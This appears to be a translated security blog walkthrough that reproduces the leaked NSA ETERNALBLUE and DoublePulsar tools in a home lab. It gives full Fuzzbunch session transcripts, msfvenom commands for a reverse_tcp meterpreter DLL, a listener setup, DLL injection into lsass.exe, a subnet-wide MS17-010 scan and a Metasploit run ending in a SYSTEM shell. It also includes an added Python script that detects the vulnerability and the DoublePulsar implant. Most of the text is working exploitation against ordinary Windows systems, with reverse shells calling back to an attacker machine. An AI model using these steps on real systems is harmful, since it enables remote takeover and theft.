Exploiting the NSA Toolkit

At 5 pm on April 14, the Shadow Brokers published the toolkit they stole from the Equation Group last year.

The toolkit released this time is 117.9 MB and contains 23 hacking tools.

The decrypted toolkit:

Reproducing the Equation Group's ETERNALBLUE

Test environment

Attack machines:

Windows 7 Pro 64-bit (192.168.1.4)
Kali 2.0 (192.168.1.29)

Python environment: python-2.6.6 (Fuzzbunch requires the 32-bit build of Python 2.6)
Python component: pywin32 (must be the 32-bit build, to match the 32-bit Python)
Equation Group ETERNALBLUE download: ETERNALBLUE
Target: Windows 7 Pro 64-bit (192.168.1.25)

Testing

Putting the various pieces of information together:

Comment out lines 26, 27 and 28 of fb.py, then comment out line 72 as well.
Then start fb.

If you get an error about listing a directory, it is because the listeningposts directory is missing: create an empty listeningposts directory alongside fb.py.

Begin configuration

[?] Default Target IP Address [] : 192.168.1.25
# enter the target IP
[?] Default Callback IP Address [] : 192.168.1.4
# enter the callback IP
[?] Use Redirection [yes] : no
# whether to use redirection
[?] Base Log directory [D:\logs] :
# base directory for log files
[*] Checking D:\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] : 0
# create a new project
[?] New Project Name : test
[?] Set target log directory to 'D:\logs\test\z192.168.1.25'? [Yes] : yes
# whether to put this target's log directory under the default base directory
[*] Initializing Global State
[+] Set TargetIp => 192.168.1.25
[+] Set CallbackIp => 192.168.1.4
[!] Redirection OFF
[+] Set LogDir => D:\logs\test\z192.168.1.25
[+] Set Project => test
fb >
# configuration complete; we are now at the fb command prompt

Run use to list the supported plugins

fb > use
Plugin Category: Touch
======================
Name Version
---- -------
Architouch 1.0.0
Domaintouch 1.1.1
Eclipsedwingtouch 1.0.4
Educatedscholartouch 1.0.0
Emeraldthreadtouch 1.0.0
Erraticgophertouch 1.0.1
Esteemaudittouch 2.1.0
Explodingcantouch 1.2.1
Iistouch 1.2.2
Namedpipetouch 2.0.0
Printjobdelete 1.0.0
Printjoblist 1.0.0
Rpctouch 2.1.0
Smbtouch 1.1.1
Webadmintouch 1.0.1
Worldclienttouch 1.0.1
Plugin Category: ImplantConfig
==============================
Name Version
---- -------
Darkpulsar 1.1.0
Mofconfig 1.0.0
Plugin Category: Exploit
========================
Name Version
---- -------
Easybee 1.0.1 MDaemon WorldClient webmail exploit
Easypi 3.1.0 IBM Lotus Notes exploit
Eclipsedwing 1.5.2 MS08-067 exploit
Educatedscholar 1.0.0 MS09-050 exploit
Emeraldthread 3.0.0 SMB and NetBIOS exploit, uses ports 445 and 139
Emphasismine 3.4.0 IMAP exploit (IBM Lotus Domino), default port 143
Englishmansdentist 1.2.0 attacks via SMTP, default port 25
Erraticgopher 1.0.1 attacks via an RPC vulnerability, port 445
Eskimoroll 1.1.1 attacks via a Kerberos vulnerability, default port 88
Esteemaudit 2.1.0 RDP exploit, default port 3389
Eternalromance 1.4.0 SMB and NBT exploit, affects ports 139 and 445
Eternalsynergy 1.0.1 SMB exploit, default port 445
Ewokfrenzy 2.0.0 IBM Lotus Domino exploit
Explodingcan 2.0.2 IIS 6.0 WebDAV exploit, only affects Windows Server 2003
Zippybeer 1.0.2 authenticated SMB exploit, default port 445
Plugin Category: Payload
========================
Name Version
---- -------
Jobadd 1.1.1
Jobdelete 1.1.1
Joblist 1.1.1
Pcdlllauncher 2.3.1
Processlist 1.1.1
Regdelete 1.1.1
Regenum 1.1.1
Regread 1.1.1
Regwrite 1.1.1
Rpcproxy 1.0.1
Smbdelete 1.1.1
Smblist 1.1.1
Smbread 1.1.1
Smbwrite 1.1.1
Plugin Category: Special
========================
Name Version
---- -------
Eternalblue 2.2.0
Eternalchampion 2.0.0

Select the Eternalblue plugin

fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.25
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
# step through the variables; the defaults are fine
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
# timeout; raise it on slow networks
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.1.25] :
# target IP
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
# target port
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
# check the SMB fingerprint against the selected Target before throwing
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
# check whether the DoublePulsar backdoor is already installed before throwing
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
# maximum number of attempts
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
# number of pool-grooming buffers; keep the default
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 1
# chosen from the target's fingerprint
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
# delivery mode: run directly from Fuzzbunch rather than via DARINGNEOPHYTE
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : yes
# confirm local execution; the default is fine
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.1.25] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.1.25:445
# confirm the target
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
# confirm and run the plugin
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (28 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 00 sional 7600.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >

Generating the DLL

On the second attack machine (Kali), use msfvenom to generate the DLL that Doublepulsar will inject into a process on the target. A reverse_tcp payload is used here; pick a different payload to suit the network environment. The payload architecture must match the target (x64 here), and the resulting DLL is copied to the Windows attack machine (E:\test.dll below) so that Fuzzbunch can read it.

root@RcoIl:~/桌面# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.29 LPORT=1024 -f dll > /root/桌面/test.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

Start msfconsole and set up the listener.

msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.1.29
lhost => 192.168.1.29
msf exploit(handler) > set lport 1024
lport => 1024
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.29:1024
[*] Starting the payload handler...

Using the Doublepulsar plugin

fb Special (Eternalblue) > use doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.25
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.1.25] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : E:\test.dll
[+] Set DllPayload => E:\test.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.1.25] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.1.25:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
DllPayload E:\test.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x6CDC31C9
SMB Connection string is: Windows 7 Professional 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

The reverse shell came back successfully.

Bulk detection of the SMB vulnerability

Downloading and loading the scanner script

root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb

Using the vulnerability scanner

msf > use auxiliary/scanner/smb/smb_ms_17_010
msf auxiliary(smb_ms_17_010) > set RHOSTS 192.168.2.1-255
RHOSTS => 192.168.2.1-255
msf auxiliary(smb_ms_17_010) > set THREADS 10
THREADS => 10
msf auxiliary(smb_ms_17_010) > run
[*] Scanned 27 of 255 hosts (10% complete)
[*] Scanned 51 of 255 hosts (20% complete)
[*] Scanned 77 of 255 hosts (30% complete)
[*] 192.168.2.103:445 - Connected to \\192.168.2.103\IPC$ with TID = 2048
[*] 192.168.2.103:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 192.168.2.103:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 103 of 255 hosts (40% complete)
[*] Scanned 131 of 255 hosts (51% complete)
[*] Scanned 153 of 255 hosts (60% complete)
[*] Scanned 179 of 255 hosts (70% complete)
[*] Scanned 205 of 255 hosts (80% complete)
[*] Scanned 230 of 255 hosts (90% complete)
[*] Scanned 255 of 255 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms_17_010) >
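The two probes that the transcripts above rely on are simple enough to implement by hand. The scanner's verdict comes from a single SMB_COM_TRANSACTION carrying TRANS_PEEK_NMPIPE on FID 0 over a null session to IPC$: an unpatched host answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched one STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. The "Pinging backdoor..." step in the Eternalblue and Doublepulsar sessions is an SMB_COM_TRANSACTION2 with subcommand SESSION_SETUP (0x000E) whose Timeout bytes sum to the ping opcode 0x23; a clean host echoes the Multiplex ID it was sent (0x41), while the implant answers 0x51. The following is an added example written for this page, not code from the original post or from Fuzzbunch or Metasploit. It assumes the target is reachable on TCP/445 and still accepts an anonymous (null) session; the packet builders and response parsers can be exercised offline against constructed responses.

```python
# Added example (not from the original post): a minimal SMB1 client for the MS17-010 check
# (TRANS_PEEK_NMPIPE on FID 0 -> STATUS_INSUFF_SERVER_RESOURCES on unpatched hosts) and the
# DoublePulsar check (TRANS2 SESSION_SETUP ping -> Multiplex ID 0x51 when the implant answers).
# Assumes the target is reachable on TCP/445 and accepts an anonymous (null) session.
import socket
import struct

SMB_HDR = "<4sBIBHH8sHHHHH"          # 32-byte SMB1 header, little-endian
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008
MID_PROBE = 0x41                     # Multiplex ID we put in every request
MID_DOUBLEPULSAR = MID_PROBE + 0x10  # what the implant sends back instead of echoing it
DP_OPCODE_PING = 0x23
DP_TIMEOUT_PING = 0x00A4D9A6         # bytes a6 d9 a4 00 sum to 0x223; the low byte is the opcode

def smb_header(cmd, tid=0, uid=0):
    # Flags 0x18: canonical, case-insensitive paths. Flags2 0x4001: NT status codes + long names,
    # no Unicode bit, so every string below is plain ASCII with a NUL terminator.
    return struct.pack(SMB_HDR, b"\xffSMB", cmd, 0, 0x18, 0x4001, 0, b"\0" * 8, 0, tid, 0xFEFF, uid, MID_PROBE)

def nbss(smb):
    """NetBIOS session service framing: type 0x00 plus a 24-bit big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def negotiate():
    dialects = b"\x02NT LM 0.12\x00"
    return nbss(smb_header(0x72) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)

def session_setup_anon():
    """SMB_COM_SESSION_SETUP_ANDX, 13-word form, zero-length passwords = null session."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 1, 0, 0, 0, 0, 0x40)
    data = b"\x00\x00" + b"Unix\x00" + b"python\x00"   # empty account and domain, native OS, native LM
    return nbss(smb_header(0x73) + b"\x0d" + words + struct.pack("<H", len(data)) + data)

def tree_connect_ipc(host, uid):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)    # no AndX, flags 0, password length 1
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00?????\x00"
    return nbss(smb_header(0x75, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data)

def peek_named_pipe(tid, uid):
    """SMB_COM_TRANSACTION, Setup = [TRANS_PEEK_NMPIPE (0x23), FID 0]: the MS17-010 check."""
    name = b"\\PIPE\\\x00"
    off = 32 + 1 + 32 + 2 + len(name)                   # header + wordcount + 16 words + bytecount + name
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0, 0, off, 0, off, 2, 0, 0x23, 0)
    return nbss(smb_header(0x25, tid, uid) + b"\x10" + words + struct.pack("<H", len(name)) + name)

def doublepulsar_ping(tid, uid):
    """SMB_COM_TRANSACTION2, Setup = [SESSION_SETUP (0x000E)], 12 zero parameter bytes."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, DP_TIMEOUT_PING, 0, 12, 66, 0, 78, 1, 0, 0x000E)
    data = b"\x00" * 13                                 # 1 pad byte + 12 parameter bytes
    return nbss(smb_header(0x32, tid, uid) + b"\x0f" + words + struct.pack("<H", len(data)) + data)

def parse_header(resp):
    """Return (command, nt_status, tid, uid, mid) from a NetBIOS-framed SMB1 response."""
    proto, cmd, status, _f, _f2, _ph, _sig, _r, tid, _pid, uid, mid = struct.unpack(SMB_HDR, resp[4:36])
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 response")
    return cmd, status, tid, uid, mid

def classify_ms17_010(resp):
    status = parse_header(resp)[1]
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE to MS17-010"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):   # what a patched host returns
        return "patched"
    return "unknown (status 0x%08X)" % status

def doublepulsar_present(resp):
    return parse_header(resp)[4] == MID_DOUBLEPULSAR

def _recv_pdu(sock):
    hdr = sock.recv(4)
    need, body = int.from_bytes(hdr[1:4], "big"), b""
    while len(body) < need:
        chunk = sock.recv(need - len(body))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        body += chunk
    return hdr + body

def probe(host, port=445, timeout=5.0):
    """Run both checks against a live host; returns (ms17_010_verdict, doublepulsar_present)."""
    with socket.create_connection((host, port), timeout) as s:
        def xchg(pkt):
            s.sendall(pkt)
            return _recv_pdu(s)
        xchg(negotiate())
        _, status, _, uid, _ = parse_header(xchg(session_setup_anon()))
        if status:
            raise RuntimeError("null session refused: 0x%08X" % status)
        _, status, tid, _, _ = parse_header(xchg(tree_connect_ipc(host, uid)))
        if status:
            raise RuntimeError("IPC$ tree connect failed: 0x%08X" % status)
        verdict = classify_ms17_010(xchg(peek_named_pipe(tid, uid)))
        return verdict, doublepulsar_present(xchg(doublepulsar_ping(tid, uid)))
```

Call probe("192.168.2.103") from a Python shell to run both checks against a host; the MS17-010 verdict is a string and the DoublePulsar result a boolean. The ping is safe to send: the implant only reports its presence, and a host that is not infected simply returns an empty TRANS2 response with the original Multiplex ID. Blocking TCP/445 at the perimeter and disabling SMBv1 removes both the exploit path and this detection path, so the check is only meaningful from inside the segment.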

Verify the results obtained.

If you don't want to verify with the method above, you can verify directly with MSF.

MSF exploitation process (SMB command execution)

msf > use exploit/windows/smb/ms17-010
msf exploit(ms17-010) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17-010) > set rhost 192.168.2.103
rhost => 192.168.2.103
msf exploit(ms17-010) > set lhost 192.168.2.105
lhost => 192.168.2.105
msf exploit(ms17-010) > show options
Module options (exploit/windows/smb/ms17-010):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH //usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Doublepulsar
ETERNALBLUEPATH //usr/share/metasploit-framework/modules/exploits/windows/smb/deps/ yes Path directory of Eternalblue
PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.2.103 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.105 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows Server 2008 R2 (x86) (x64)
msf exploit(ms17-010) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64
msf exploit(ms17-010) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows XP (all services pack) (x86) (x64)
2 Windows Server 2003 SP0 (x86)
3 Windows Server 2003 SP1/SP2 (x86)
4 Windows Server 2003 (x64)
5 Windows Vista (x86)
6 Windows Vista (x64)
7 Windows Server 2008 (x86)
8 Windows Server 2008 R2 (x86) (x64)
9 Windows 7 (all services pack) (x86) (x64)
msf exploit(ms17-010) > set targets 9
targets => 9
msf exploit(ms17-010) > exploit
[*] Started reverse TCP handler on 192.168.2.105:4444
[*] 192.168.2.103:445 - Generating Eternalblue XML data
[*] 192.168.2.103:445 - Generating Doublepulsar XML data
[*] 192.168.2.103:445 - Generating payload DLL for Doublepulsar
[*] 192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.2.103:445 - Launching Eternalblue...
[+] 192.168.2.103:445 - Backdoor is already installed
[*] 192.168.2.103:445 - Launching Doublepulsar...
[*] Sending stage (1189423 bytes) to 192.168.2.103
[*] Meterpreter session 1 opened (192.168.2.105:4444 -> 192.168.2.103:62662) at 2017-04-29 15:43:03 +0800
[+] 192.168.2.103:445 - Remote code executed... 3... 2... 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : RCOIL-PC
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >

Note: the command typed above is set targets 9, which Metasploit accepts as an arbitrary datastore variable (hence the echo targets => 9) without changing the exploit target; the correct command is set target 9. The run still succeeds here because target 8 (Windows Server 2008 R2) uses the same WIN72K8R2 Eternalblue profile as Windows 7, and because the Doublepulsar backdoor was already present on the host (Backdoor is already installed), so only the DLL injection step had to run. This module wraps the leaked Windows binaries under Wine (see DOUBLEPULSARPATH, ETERNALBLUEPATH and WINEPATH), which is why the 32-bit dependencies and the Wine drive_c path must be set up before it will work.

Reference: Explotando CVE-2017-010 con Eternalblue y Doublepulsar desde Metasploit

Follow-up

http://www.freebuf.com/?s=NSA
